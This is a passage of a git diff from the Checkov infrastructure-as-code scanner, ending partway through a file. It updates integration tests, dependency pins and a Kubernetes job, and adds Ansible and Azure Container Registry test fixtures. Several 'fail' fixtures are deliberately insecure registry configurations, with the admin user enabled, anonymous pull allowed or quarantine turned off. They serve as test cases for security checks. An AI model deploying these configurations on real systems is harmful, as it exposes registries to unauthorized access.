   pipenv run checkov --list --bc-api-key $BC_KEY --output-bc-ids > checkov_checks_list.txt
diff --git a/integration_tests/run_integration_tests.sh b/integration_tests/run_integration_tests.sh
index fe3b247d8d5..02718a798df 100755
--- a/integration_tests/run_integration_tests.sh
+++ b/integration_tests/run_integration_tests.sh
@@ -24,7 +24,6 @@ prepare_data () {
 
   python checkov/main.py -s -f repositories/terragoat/terraform/aws/s3.tf --repo-id checkov/integration_test --bc-api-key $BC_KEY > checkov_report_s3_singlefile_api_key_terragoat.txt
   python checkov/main.py -s -d repositories/terragoat/terraform/azure/ --repo-id checkov/integration_test --bc-api-key $BC_KEY > checkov_report_azuredir_api_key_terragoat.txt
-  python checkov/main.py -s -d integration_tests/example_workflow_file/.github/workflows/ -o json --repo-id checkov/integration_test --bc-api-key $BC_KEY --include-all-checkov-policies > checkov_report_workflow_cve.json
   python checkov/main.py -s -d integration_tests/example_workflow_file/bitbucket/ -o json --repo-id checkov/integration_test --bc-api-key $BC_KEY --include-all-checkov-policies > checkov_report_bitbucket_pipelines_cve.json
   python checkov/main.py --list --bc-api-key $BC_KEY --output-bc-ids > checkov_checks_list.txt
 }
diff --git a/integration_tests/test_checkov_cli_integration_report.py b/integration_tests/test_checkov_cli_integration_report.py
index 5234379ec1f..d29b45fe6bc 100644
--- a/integration_tests/test_checkov_cli_integration_report.py
+++ b/integration_tests/test_checkov_cli_integration_report.py
@@ -28,42 +28,20 @@ def validate_report(self, report_path, url_should_exist=True):
                     platform_url_found = True
             self.assertEqual(platform_url_found, url_should_exist, "when using api key and not --skip-results-upload, platform code review url should exist")
 
-    def test_workflow_report_api_key(self):
-        report_path = os.path.join(current_dir, '..', 'checkov_report_workflow_cve.json')
-        if sys.version_info[1] == 8 and platform.system() == 'Linux':
-            with open(report_path, encoding='utf-8') as f:
-                reports = json.load(f)
-                self.assertGreaterEqual(len(reports), 2,
-                                        "expecting to have 2 reports at least, github_Actions and sca_image")
-                github_actions_report_exists = False
-                sca_image = False
-                for report in reports:
-                    if report["check_type"] == "github_actions":
-                        github_actions_report_exists = True
-                        self.assertGreaterEqual(report['summary']['failed'], 1)
-                    if report["check_type"] == "sca_image":
-                        sca_image = True
-                        self.assertGreaterEqual(report['summary']['failed'], 1)
-                self.assertTrue(sca_image)
-                self.assertTrue(github_actions_report_exists)
-
     def test_bitbucket_pipelines_report_api_key(self):
         report_path = os.path.join(current_dir, '..', 'checkov_report_bitbucket_pipelines_cve.json')
+        # the below condition exist because checkov_report_bitbucket_pipelines_cve.json is
+        # generated only on Linux with Python 3.8 - see prepare_data.sh script
         if sys.version_info[1] == 8 and platform.system() == 'Linux':
             with open(report_path, encoding='utf-8') as f:
-                reports = json.load(f)
-                self.assertGreaterEqual(len(reports), 2,
-                                        "expecting to have 2 reports at least, bitbucket_pipelines and sca_image")
+                report = json.load(f)
+                self.assertGreaterEqual(len(report), 1,
+                                        "expecting to have one report at least - bitbucket_pipelines ")
                 bitbucket_pipelines_actions_report_exists = False
-                sca_image = False
-                for report in reports:
-                    if report["check_type"] == "bitbucket_pipelines":
-                        bitbucket_pipelines_actions_report_exists = True
-                        self.assertGreaterEqual(report['summary']['failed'], 1)
-                    if report["check_type"] == "sca_image":
-                        sca_image = True
-                        self.assertGreaterEqual(report['summary']['failed'], 1)
-                self.assertTrue(sca_image)
+                if report["check_type"] == "bitbucket_pipelines":
+                    bitbucket_pipelines_actions_report_exists = True
+                    self.assertGreaterEqual(report['summary']['failed'], 1)
+
                 self.assertTrue(bitbucket_pipelines_actions_report_exists)
 
 
diff --git a/kubernetes/checkov-job.yaml b/kubernetes/checkov-job.yaml
index b197ded48f4..1595551c117 100644
--- a/kubernetes/checkov-job.yaml
+++ b/kubernetes/checkov-job.yaml
@@ -168,7 +168,6 @@ spec:
   template:
     metadata:
       annotations:
-        seccomp.security.alpha.kubernetes.io/pod: runtime/default
         checkov.io/skip1: CKV_K8S_22=Checkov requires filesystem write access to dump resource definitions
         checkov.io/skip2: CKV_K8S_38=Service Account is required for read-only API access
         checkov.io/skip3: CKV_K8S_14=Preferring latest rules every run - image pull always
@@ -177,6 +176,8 @@ spec:
       securityContext:
         runAsUser: 12000
         runAsNonRoot: true
+        seccompProfile:
+          type: RuntimeDefault
       restartPolicy: Never
       serviceAccountName: checkov
       containers:
diff --git a/kubernetes/requirements.txt b/kubernetes/requirements.txt
index 27cb7f54929..1549c3848f9 100644
--- a/kubernetes/requirements.txt
+++ b/kubernetes/requirements.txt
@@ -1 +1 @@
-checkov==3.2.16
+checkov==3.2.214
diff --git a/performance_tests/test_checkov_performance.py b/performance_tests/test_checkov_performance.py
index fd2aef36210..12d7b4cfbe7 100644
--- a/performance_tests/test_checkov_performance.py
+++ b/performance_tests/test_checkov_performance.py
@@ -18,7 +18,7 @@
         'repo_name': 'terraform-aws-components',
         'threshold': {
             "Darwin": 19.0,
-            "Linux": 8.0,
+            "Linux": 10.0,
             "Windows": 15.0,
         }
     },
diff --git a/pyproject.toml b/pyproject.toml
index 88a8e7d87d4..6cb700920d4 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -41,7 +41,6 @@ forbidden_modules = [
     "checkov.policies_3d",
     "checkov.sast",
     "checkov.sca_image",
-    "checkov.sca_package",
     "checkov.sca_package_2",
     "checkov.secrets",
     "checkov.serverless",
@@ -61,7 +60,6 @@ ignore_imports = [
     "checkov.common.runners.runner_registry -> checkov.terraform.modules.module_objects", # Should fix usage of get_enriched_resources
 
     "checkov.common.output.report -> checkov.policies_3d.output", # move to checkov.common.output
-    "checkov.common.output.report -> checkov.sca_package.output", # move to checkov.common.output
     "checkov.common.output.report -> checkov.sca_package_2.output", # move to checkov.common.output
 
     "checkov.common.checks_infra.solvers.connections_solvers.connection_exists_solver -> checkov.terraform.graph_builder.graph_components.block_types", # move to checkov.common.graph.graph_builder.graph_components?
diff --git a/setup.py b/setup.py
index a992eac9ab4..f805fc9b21b 100644
--- a/setup.py
+++ b/setup.py
@@ -66,7 +66,7 @@ def run(self) -> None:
     },
     install_requires=[
         "bc-python-hcl2==0.4.2",
-        "bc-detect-secrets==1.5.4",
+        "bc-detect-secrets==1.5.15",
         "bc-jsonpath-ng==1.6.1",
         "pycep-parser==0.4.1",
         "tabulate>=0.9.0,<0.10.0",
@@ -74,40 +74,42 @@ def run(self) -> None:
         "termcolor>=1.1.0,<2.4.0",
         "junit-xml>=1.9,<2.0",
         "dpath==2.1.3",
-        "pyyaml>=6.0.0,<7.0.0",
+        "pyyaml<7.0.0,>=6.0.0",
         "boto3==1.34.25",
         "gitpython>=3.1.30,<4.0.0",
         "jmespath>=1.0.0,<2.0.0",
-        "tqdm>=4.65.0,<5.0.0",
+        "tqdm<5.0.0,>=4.65.0",
         "packaging>=23.0,<24.0",
-        "cloudsplaining>=0.6.2,<0.7.0",
+        "cloudsplaining<0.7.0,>=0.6.2",
         "networkx<2.7",
-        "dockerfile-parse>=2.0.0,<3.0.0",
+        "dockerfile-parse<3.0.0,>=2.0.0",
         "docker>=6.0.1,<8.0.0",
         "configargparse>=1.5.3,<2.0.0",
-        "argcomplete>=3.0.0,<4.0.0",
-        "typing-extensions>=4.5.0,<5.0.0",
+        "argcomplete<4.0.0,>=3.0.0",
+        "typing-extensions<5.0.0,>=4.5.0",
         "importlib-metadata>=6.0.0,<8.0.0",
         "cachetools>=5.2.0,<6.0.0",
-        "cyclonedx-python-lib>=6.0.0,<7.0.0",
-        "packageurl-python>=0.11.1,<0.14.0",
-        "click>=8.1.0,<9.0.0",
-        "aiohttp>=3.8.0,<4.0.0",
-        "aiodns>=3.0.0,<4.0.0",
+        "cyclonedx-python-lib<7.0.0,>=6.0.0",
+        "packageurl-python<0.14.0,>=0.11.1",
+        "click<9.0.0,>=8.1.0",
+        "aiohttp<4.0.0,>=3.8.0",
+        "aiodns<4.0.0,>=3.0.0",
         "aiomultiprocess>=0.9.0,<0.10.0",
-        "jsonschema>=4.17.0,<5.0.0",
-        "prettytable>=3.6.0,<4.0.0",
-        "charset-normalizer>=3.1.0,<4.0.0",
+        "schema<=0.7.5",
+        "jsonschema<5.0.0,>=4.17.0",
+        "prettytable<4.0.0,>=3.6.0",
+        "charset-normalizer<4.0.0,>=3.1.0",
         "pyston-autoload==2.3.5; python_version < '3.11' and (sys_platform == 'linux' or sys_platform == 'darwin') and platform_machine == 'x86_64' and implementation_name == 'cpython'",
         "pyston==2.3.5; python_version < '3.11' and (sys_platform == 'linux' or sys_platform == 'darwin') and platform_machine == 'x86_64' and implementation_name == 'cpython'",
-        "requests>=2.28.0,<3.0.0",
-        "yarl>=1.9.1,<2.0.0",
+        "requests<3.0.0,>=2.28.0",
+        "yarl<2.0.0,>=1.9.1",
         "openai<1.0.0",
-        "spdx-tools<0.9.0,>=0.8.0",
-        "license-expression>=30.1.0,<31.0.0",
+        "spdx-tools>=0.8.0,<0.9.0",
+        "license-expression<31.0.0,>=30.1.0",
         "rustworkx>=0.13.0,<0.14.0",
-        "pydantic>=2.0.0,<3.0.0",
-        "botocore==1.34.25"
+        "pydantic<3.0.0,>=2.0.0",
+        "botocore==1.34.25",
+        "urllib3",
     ],
     dependency_links=[],  # keep it empty, needed for pipenv-setup
     license="Apache License 2.0",
@@ -141,6 +143,7 @@ def run(self) -> None:
         "checkov.terraform.checks.graph_checks": ["**/*.json"],
         "checkov.cdk.checks": [
             "python/*.yaml",
+            "typescript/*.yaml",
         ],
     },
     scripts=["bin/checkov", "bin/checkov.cmd"],
diff --git a/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/expected.yaml b/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/expected.yaml
index b4e3c70b99f..53d988ecbf3 100644
--- a/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/expected.yaml
+++ b/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/expected.yaml
@@ -1,5 +1,6 @@
 pass:
   - "tasks.ansible.builtin.get_url.https"
+  - "tasks.get_url.unknown" # update test when variable rendering is supported
 fail:
   - "tasks.get_url.http"
 evaluated_keys:
diff --git a/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/unknown.yaml b/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/unknown.yaml
new file mode 100644
index 00000000000..2e7ab9b9f53
--- /dev/null
+++ b/tests/ansible/checks/graph_checks/resources/GetUrlHttpsOnly/unknown.yaml
@@ -0,0 +1,11 @@
+---
+- name: Verify tests
+  hosts: all
+  vars:
+    variable_url: https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar
+  tasks:
+    - name: unknown
+      get_url:
+        url: "{{ variable_url }}"
+        dest: /etc/foo.conf
+        force_basic_auth: yes
diff --git a/tests/ansible/test_graph_manager.py b/tests/ansible/test_graph_manager.py
index 037a3193570..6d3909e9d29 100644
--- a/tests/ansible/test_graph_manager.py
+++ b/tests/ansible/test_graph_manager.py
@@ -34,15 +34,17 @@ def test_build_graph_from_definitions():
     assert task.attributes[CustomAttributes.RESOURCE_TYPE] == "tasks.amazon.aws.ec2_instance"
     assert task.attributes[START_LINE] == 11
     assert task.attributes[END_LINE] == 22
-    assert task.config == {
-        "name": "public-compute-instance",
-        "key_name": "prod-ssh-key",
-        "vpc_subnet_id": "subnet-5ca1ab1e",
-        "instance_type": "c5.large",
-        "security_group": "default",
-        "network": {"assign_public_ip": True, "__startline__": 19, "__endline__": 20},
-        "image_id": "ami-123456",
-        "ebs_optimized": True,
-        "__startline__": 13,
-        "__endline__": 22,
-    }
+    assert task.config == {'name': 'enabled',
+                           'amazon.aws.ec2_instance':
+                               {'name': 'public-compute-instance',
+                                'key_name': 'prod-ssh-key',
+                                'vpc_subnet_id': 'subnet-5ca1ab1e',
+                                'instance_type': 'c5.large',
+                                'security_group': 'default',
+                                'network': {'assign_public_ip': True, '__startline__': 19, '__endline__': 20},
+                                'image_id': 'ami-123456',
+                                'ebs_optimized': True,
+                                '__startline__': 13,
+                                '__endline__': 22},
+                           '__startline__': 11,
+                           '__endline__': 22}
diff --git a/tests/ansible/test_utils.py b/tests/ansible/test_utils.py
index 62ee318aa7e..946f60641ba 100644
--- a/tests/ansible/test_utils.py
+++ b/tests/ansible/test_utils.py
@@ -1,7 +1,7 @@
 from pathlib import Path
 
 from checkov.ansible.runner import Runner
-from checkov.ansible.utils import build_definitions_context
+from checkov.ansible.utils import build_definitions_context, create_definitions
 
 EXAMPLES_DIR = Path(__file__).parent / "examples"
 
@@ -45,3 +45,10 @@ def test_build_definitions_context():
             "suppress_comment": "No comment provided",
         }
     ]
+
+
+def test_create_definitions():
+    definitions, definitions_raw = create_definitions(root_folder=str(EXAMPLES_DIR))
+
+    assert len(definitions) > 0
+    assert all(key.endswith(".yml") or key.endswith(".yaml") and len(value) > 0 for key, value in definitions.items())
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_ACRAdminAccountDisabled/fail.json b/tests/arm/checks/resource/example_ACRAdminAccountDisabled/fail.json
new file mode 100644
index 00000000000..da47aaf9839
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAdminAccountDisabled/fail.json
@@ -0,0 +1,37 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.1",
+  "resources": [
+    {
+      "apiVersion": "2019-05-01",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Basic"
+      },
+      "properties": {
+        "adminUserEnabled": true,
+        "anonymousPullEnabled": true,
+        "dataEndpointEnabled": true,
+        "encryption": {
+          "keyVaultProperties": {
+            "identity": "someIdentity",
+            "keyIdentifier": "someKeyIdentifier"
+          },
+          "status": "enabled"
+        },
+        "networkRuleBypassOptions": "AzureServices",
+        "networkRuleSet": {
+          "defaultAction": "Deny",
+          "ipRules": [
+            {
+              "action": "Allow",
+              "value": "127.0.0.1"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAdminAccountDisabled/pass.json b/tests/arm/checks/resource/example_ACRAdminAccountDisabled/pass.json
new file mode 100644
index 00000000000..a415c30602e
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAdminAccountDisabled/pass.json
@@ -0,0 +1,37 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.1",
+  "resources": [
+    {
+      "apiVersion": "2019-05-01",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Standard"
+      },
+      "properties": {
+        "adminUserEnabled":  false,
+        "anonymousPullEnabled": true,
+        "dataEndpointEnabled": true,
+        "encryption": {
+          "keyVaultProperties": {
+            "identity": "someIdentity",
+            "keyIdentifier": "someKeyIdentifier"
+          },
+          "status": "enabled"
+        },
+        "networkRuleBypassOptions": "AzureServices",
+        "networkRuleSet": {
+          "defaultAction": "Deny",
+          "ipRules": [
+            {
+              "action": "Allow",
+              "value": "127.0.0.1"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail.json
new file mode 100644
index 00000000000..f489195f39c
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2021-09-01",
+      "name": "fail",
+      "location": "eastus",
+      "sku": {
+        "name": "Standard"
+      },
+      "properties": {
+        "anonymousPullEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail2.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail2.json
new file mode 100644
index 00000000000..74c8af184a0
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/fail2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2021-09-01",
+      "name": "fail2",
+      "location": "eastus",
+      "sku": {
+        "name": "Premium"
+      },
+      "properties": {
+        "anonymousPullEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass.json
new file mode 100644
index 00000000000..07f29b948a3
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2021-09-01",
+      "name": "pass",
+      "location": "eastus",
+      "sku": {
+        "name": []
+      },
+      "properties": {
+        "anonymousPullEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass2.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass2.json
new file mode 100644
index 00000000000..f48095bb9de
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2021-09-01",
+      "name": "pass2",
+      "location": "eastus",
+      "sku": {
+        "name": "Premium"
+      },
+      "properties": {
+        "anonymousPullEnabled": false
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass3.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass3.json
new file mode 100644
index 00000000000..a961d830bb4
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass3.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2021-09-01",
+      "name": "pass3",
+      "location": "eastus",
+      "sku": {
+        "name": "Premium"
+      },
+      "properties": {
+        "zoneRedundancy": "Disabled"
+
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass4.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass4.json
new file mode 100644
index 00000000000..9e83eae9d55
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass4.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2021-09-01",
+      "name": "pass4",
+      "location": "eastus",
+      "sku": {
+        "name": "Standard"
+      },
+      "properties": {
+        "zoneRedundancy": "Disabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass5.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass5.json
new file mode 100644
index 00000000000..61eef7b345e
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass5.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2021-09-01",
+      "name": "pass5",
+      "location": "eastus",
+      "sku": {
+        "name": "Basic"
+      },
+      "properties": {
+        "anonymousPullEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass6.json b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass6.json
new file mode 100644
index 00000000000..5936f1d2642
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRAnonymousPullDisabled/pass6.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2021-09-01",
+      "name": "pass6",
+      "location": "eastus",
+      "properties": {
+        "anonymousPullEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRContainerScanEnabled/fail.json b/tests/arm/checks/resource/example_ACRContainerScanEnabled/fail.json
new file mode 100644
index 00000000000..da47aaf9839
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRContainerScanEnabled/fail.json
@@ -0,0 +1,37 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.1",
+  "resources": [
+    {
+      "apiVersion": "2019-05-01",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Basic"
+      },
+      "properties": {
+        "adminUserEnabled": true,
+        "anonymousPullEnabled": true,
+        "dataEndpointEnabled": true,
+        "encryption": {
+          "keyVaultProperties": {
+            "identity": "someIdentity",
+            "keyIdentifier": "someKeyIdentifier"
+          },
+          "status": "enabled"
+        },
+        "networkRuleBypassOptions": "AzureServices",
+        "networkRuleSet": {
+          "defaultAction": "Deny",
+          "ipRules": [
+            {
+              "action": "Allow",
+              "value": "127.0.0.1"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACRContainerScanEnabled/pass.json b/tests/arm/checks/resource/example_ACRContainerScanEnabled/pass.json
new file mode 100644
index 00000000000..5b0807eb75b
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACRContainerScanEnabled/pass.json
@@ -0,0 +1,37 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.1",
+  "resources": [
+    {
+      "apiVersion": "2019-05-01",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Standard"
+      },
+      "properties": {
+        "adminUserEnabled": true,
+        "anonymousPullEnabled": true,
+        "dataEndpointEnabled": true,
+        "encryption": {
+          "keyVaultProperties": {
+            "identity": "someIdentity",
+            "keyIdentifier": "someKeyIdentifier"
+          },
+          "status": "enabled"
+        },
+        "networkRuleBypassOptions": "AzureServices",
+        "networkRuleSet": {
+          "defaultAction": "Deny",
+          "ipRules": [
+            {
+              "action": "Allow",
+              "value": "127.0.0.1"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACREnableImageQuarantine/fail.json b/tests/arm/checks/resource/example_ACREnableImageQuarantine/fail.json
new file mode 100644
index 00000000000..25ca6078fd9
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACREnableImageQuarantine/fail.json
@@ -0,0 +1,42 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.1",
+  "resources": [
+    {
+      "apiVersion": "2019-05-01",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Basic"
+      },
+      "properties": {
+        "adminUserEnabled": true,
+        "anonymousPullEnabled": true,
+        "dataEndpointEnabled": true,
+        "encryption": {
+          "keyVaultProperties": {
+            "identity": "someIdentity",
+            "keyIdentifier": "someKeyIdentifier"
+          },
+          "status": "enabled"
+        },
+        "policies": {
+          "quarantinePolicy": {
+            "status": "disabled"
+          }
+        },
+        "networkRuleBypassOptions": "AzureServices",
+        "networkRuleSet": {
+          "defaultAction": "Deny",
+          "ipRules": [
+            {
+              "action": "Allow",
+              "value": "127.0.0.1"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACREnableImageQuarantine/pass.json b/tests/arm/checks/resource/example_ACREnableImageQuarantine/pass.json
new file mode 100644
index 00000000000..8eafaff4ad4
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACREnableImageQuarantine/pass.json
@@ -0,0 +1,42 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.1",
+  "resources": [
+    {
+      "apiVersion": "2019-05-01",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "sku": {
+        "name": "Standard"
+      },
+      "properties": {
+        "adminUserEnabled": true,
+        "anonymousPullEnabled": true,
+        "dataEndpointEnabled": true,
+        "encryption": {
+          "keyVaultProperties": {
+            "identity": "someIdentity",
+            "keyIdentifier": "someKeyIdentifier"
+          },
+          "status": "enabled"
+        },
+        "policies": {
+          "quarantinePolicy": {
+            "status": "enabled"
+          }
+        },
+        "networkRuleBypassOptions": "AzureServices",
+        "networkRuleSet": {
+          "defaultAction": "Deny",
+          "ipRules": [
+            {
+              "action": "Allow",
+              "value": "127.0.0.1"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail1.json b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail1.json
new file mode 100644
index 00000000000..8e2c9c7d2ea
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail1.json
@@ -0,0 +1,26 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "comments": "Container registry for storing docker images",
+      "type": "Microsoft.ContainerRegistry/registries",
+      "apiVersion": "2020-11-01",
+      "name": "fail1",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('acrSku')]",
+        "tier": "[parameters('acrSku')]"
+      },
+      "tags": {
+        "displayName": "Container Registry",
+        "container.registry": "[parameters('acrName')]"
+      },
+      "properties": {
+        "adminUserEnabled": "[parameters('acrAdminUserEnabled')]",
+        "zoneRedundancy":
+          "Disabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail2.json b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail2.json
new file mode 100644
index 00000000000..fd1181c7712
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/fail2.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.ContainerRegistry/registries/replications",
+      "apiVersion": "2020-11-01",
+      "name": "fail2",
+      "location": "[parameters('acrReplicaLocation')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.ContainerRegistry/registries/', parameters('acrName'))]"
+      ],
+      "properties": {
+        "zoneRedundancy": "Disabled"
+      }
+    }
+  ],
+
+  "outputs": {
+    "acrLoginServer": {
+      "value": "[reference(resourceId('Microsoft.ContainerRegistry/registries',parameters('acrName')),'2019-12-01').loginServer]",
+      "type": "string"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass.json b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass.json
new file mode 100644
index 00000000000..371c3b60e4e
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass.json
@@ -0,0 +1,24 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources":
+      [{
+        "comments": "Container registry for storing docker images",
+        "type": "Microsoft.ContainerRegistry/registries",
+        "apiVersion": "2020-11-01",
+        "name": "pass",
+        "location": "[parameters('location')]",
+        "sku": {
+          "name": "[parameters('acrSku')]",
+          "tier": "[parameters('acrSku')]"
+        },
+        "tags": {
+          "displayName": "Container Registry",
+          "container.registry": "[parameters('acrName')]"
+        },
+        "properties": {
+          "adminUserEnabled": "[parameters('acrAdminUserEnabled')]",
+          "zoneRedundancy": "Enabled"
+        }
+      }]
+      }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass2.json b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass2.json
new file mode 100644
index 00000000000..48cb8ede926
--- /dev/null
+++ b/tests/arm/checks/resource/example_ACREnableZoneRedundancy/pass2.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [{
+  "type": "Microsoft.ContainerRegistry/registries/replications",
+  "apiVersion": "2020-11-01",
+  "name": "pass2",
+  "location": "[parameters('acrReplicaLocation')]",
+  "dependsOn": [
+    "[resourceId('Microsoft.ContainerRegistry/registries/', parameters('acrName'))]"
+  ],
+  "properties": {
+    "zoneRedundancy": "Enabled"
+  },
+
+    "outputs": {
+      "acrLoginServer": {
